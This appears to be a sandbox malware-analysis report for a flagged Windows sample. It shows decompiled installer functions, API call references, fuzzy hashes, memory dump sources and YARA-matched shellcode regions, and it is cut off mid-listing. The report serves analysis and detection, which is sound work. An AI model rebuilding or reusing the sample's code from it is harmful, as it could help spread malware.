                                                    • Opcode ID: 13217ba652e4c0004135ddf14d2fdae94276a8346d6094b6e2ca8834c9d07770
                                                    • Instruction ID: 1238864f951968f7a69ddad796cf6f28c2cd02d7cb81d74efa810d70cc71421c
                                                    • Opcode Fuzzy Hash: 13217ba652e4c0004135ddf14d2fdae94276a8346d6094b6e2ca8834c9d07770
                                                    • Instruction Fuzzy Hash: D7115471900205EADB14DFA0CA9C5AE77B4EF04345F21843FE142A72D0D6B88A45DB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a270;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42922c =  *0x42922c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0);
					}
				}
				return 0;
			}











                                                    0x0040138a
                                                    0x004013fa
                                                    0x0040139b
                                                    0x004013a0
                                                    0x00000000
                                                    0x00000000
                                                    0x004013a2
                                                    0x004013a3
                                                    0x004013ad
                                                    0x00000000
                                                    0x00401404
                                                    0x004013b0
                                                    0x004013b7
                                                    0x004013bd
                                                    0x004013be
                                                    0x004013c0
                                                    0x004013c2
                                                    0x004013b9
                                                    0x004013b9
                                                    0x004013ba
                                                    0x004013ba
                                                    0x004013c9
                                                    0x004013cb
                                                    0x004013f4
                                                    0x004013f4
                                                    0x004013c9
                                                    0x00000000

                                                    APIs
                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                    • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                    • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                    • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040238E(void* __ebx) {
				short* _t6;
				long _t8;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402C53(0x22);
					_t18 =  *(_t23 - 0x18) & 0x00000002;
					__eflags =  *(_t23 - 0x18) & 0x00000002;
					_t8 = E00402C93(E00402D48( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t22 = E00402D5D(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueW(_t22, E00402C53(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                    0x0040238e
                                                    0x0040238e
                                                    0x00402391
                                                    0x004023c0
                                                    0x004023c8
                                                    0x004023c8
                                                    0x004023d6
                                                    0x004023db
                                                    0x00000000
                                                    0x00402393
                                                    0x0040239a
                                                    0x0040239e
                                                    0x004028a1
                                                    0x004028a1
                                                    0x004023a4
                                                    0x004023b4
                                                    0x004023b6
                                                    0x004023dd
                                                    0x004023df
                                                    0x00000000
                                                    0x004023e5
                                                    0x004023df
                                                    0x0040239e
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                      • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000529,00000000,00000022,00000000,?,?), ref: 00402D85
                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseDeleteOpenValue
                                                    • String ID:
                                                    • API String ID: 849931509-0
                                                    • Opcode ID: 614ce0340cb981b154b3a26247d5c036683afc4e7d23ad5ac61aef5008d0898a
                                                    • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
                                                    • Opcode Fuzzy Hash: 614ce0340cb981b154b3a26247d5c036683afc4e7d23ad5ac61aef5008d0898a
                                                    • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableShow
                                                    • String ID:
                                                    • API String ID: 1136574915-0
                                                    • Opcode ID: 96ba272427f40abb09d78c6464fe8e75707ad2a82ea249626ada524d232d223f
                                                    • Instruction ID: 50398dcd8f08d813da2dc86a20fdec6a2780ea60cea6e306d4739c988c0027c9
                                                    • Opcode Fuzzy Hash: 96ba272427f40abb09d78c6464fe8e75707ad2a82ea249626ada524d232d223f
                                                    • Instruction Fuzzy Hash: 15E0D832A08204CFD724DBF4AE8446E73B0EB40318721457FE402F11D0CBF848419B6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004065EC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004065EC(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E0040657C(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                    0x004065f4
                                                    0x004065f7
                                                    0x004065fe
                                                    0x00406606
                                                    0x00406612
                                                    0x00000000
                                                    0x00406619
                                                    0x00406609
                                                    0x00406610
                                                    0x00000000
                                                    0x00406621
                                                    0x00000000

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                      • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                      • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
                                                      • Part of subcall function 0040657C: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2547128583-0
                                                    • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                    • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
                                                    • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                    • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405DE7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00405DE7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                    0x00405deb
                                                    0x00405df8
                                                    0x00405e0d
                                                    0x00405e13

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,80000000,00000003), ref: 00405DEB
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate
                                                    • String ID:
                                                    • API String ID: 415043291-0
                                                    • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                    • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                    • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                    • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405DC2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405DC2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                    0x00405dc7
                                                    0x00405dcd
                                                    0x00405dd2
                                                    0x00405ddb
                                                    0x00405ddb
                                                    0x00405de4

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DDB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                    • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
                                                    • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                    • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004058BD Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004058BD(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                    0x004058c3
                                                    0x004058cb
                                                    0x00000000
                                                    0x004058d1
                                                    0x00000000

                                                    APIs
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
                                                    • GetLastError.KERNEL32 ref: 004058D1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID:
                                                    • API String ID: 1375471231-0
                                                    • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                    • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
                                                    • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                    • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03326293 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 0b75380f0c720a71f15f6e5fa1024b56e24ca61ac5f58774c4a06d17bf2d3c16
                                                    • Instruction ID: 617950feff9f2d2eddc6a744d10fe7890e557cfcba147452632f0a71ab84cbd3
                                                    • Opcode Fuzzy Hash: 0b75380f0c720a71f15f6e5fa1024b56e24ca61ac5f58774c4a06d17bf2d3c16
                                                    • Instruction Fuzzy Hash: 2141E83A024D404EC225CEB8E6D11DABFF07E7B2617341A648248FF752F177070ACAA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03326324 Relevance: 1.7, APIs: 1, Instructions: 215COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: b3dea49390ac03a0188a6b5c29354ef2abeb471abf0319f7d665a4eeba44463a
                                                    • Instruction ID: 944484e8ee07f998051041c694b1e712cb9304167fd51b5938b0ebe440d187e2
                                                    • Opcode Fuzzy Hash: b3dea49390ac03a0188a6b5c29354ef2abeb471abf0319f7d665a4eeba44463a
                                                    • Instruction Fuzzy Hash: BE41BD36414D415DC221CEB8E9D11DABFB47E3B2A17341AA58254FF603F123531FCAAA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033262B7 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 8fcda1f1077db3632958f30073af2f9ed89b46f15bbf84dd9dd65db41681b597
                                                    • Instruction ID: bc97e1ee61b67ddc3bede11c6979ba17d66a85541152b465ad490d7426366e22
                                                    • Opcode Fuzzy Hash: 8fcda1f1077db3632958f30073af2f9ed89b46f15bbf84dd9dd65db41681b597
                                                    • Instruction Fuzzy Hash: D501497505A9849ED71ACB24C9AA2F4BF78EFEA301B1C4DCDD9804AA42DB700814CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402C53(0xffffffd0);
				_t16 = E00402C53(0xffffffdf);
				E00402C53(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E00406555(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E004060B3(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                    0x00401684
                                                    0x0040168d
                                                    0x0040168f
                                                    0x00401696
                                                    0x0040169e
                                                    0x004016aa
                                                    0x004028a1
                                                    0x004016be
                                                    0x004016c0
                                                    0x004016c5
                                                    0x00000000
                                                    0x004016c5
                                                    0x004016a0
                                                    0x004016a0
                                                    0x0040224b
                                                    0x0040224b
                                                    0x0040224b
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileMove
                                                    • String ID:
                                                    • API String ID: 3562171763-0
                                                    • Opcode ID: 4ceb40581926d83e5aa34b7369f5554f3a045ebcc535104314e3d4f7a8af095c
                                                    • Instruction ID: 60e635295c4898b6971f0d6b86fcc4365428ea47b068a52fddb524a00f4394d8
                                                    • Opcode Fuzzy Hash: 4ceb40581926d83e5aa34b7369f5554f3a045ebcc535104314e3d4f7a8af095c
                                                    • Instruction Fuzzy Hash: 76F0BB31608524A7DB10B7B59F4DD9E2154AF4236CB21837FF512B21D0DABDC542457F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402805 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 33%
                                                    			E00402805(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C31(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x50)) = _t15;
					_t10 = SetFilePointer(E00406172(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406159();
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                    0x00402805
                                                    0x00402805
                                                    0x00402806
                                                    0x0040280e
                                                    0x00402813
                                                    0x00402814
                                                    0x00402823
                                                    0x0040282c
                                                    0x00402a7d
                                                    0x00402a7e
                                                    0x00402a81
                                                    0x00402a81
                                                    0x0040282c
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823
                                                      • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
